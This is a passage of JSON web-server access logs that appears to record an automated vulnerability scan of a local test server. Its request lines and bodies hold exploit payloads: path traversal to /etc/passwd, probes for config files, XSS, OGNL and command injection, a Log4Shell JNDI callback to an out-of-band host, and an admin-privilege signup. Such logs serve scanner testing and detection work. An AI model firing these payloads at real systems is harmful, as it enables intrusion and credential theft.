/?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.716","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.521","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.old HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.709","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"@\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.945","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.275","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A28fHqYcZCnnYYBQBTMS7aA8rUkE\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.558","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.c9oms3gsmpve1ijt0mc0gg9f4aj8sd8zo.oast.live/test}&url=https://localhost HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.149","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"28fHqXeF7Ba4SLkyB9Bgn6n0Of5.tld","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.795","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.377","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.139","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 